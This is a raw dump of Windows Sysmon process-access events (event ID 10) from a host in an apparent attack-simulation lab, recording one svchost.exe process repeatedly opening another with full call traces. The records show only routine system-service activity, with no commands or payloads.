10341000x800000000000000010801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.149{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
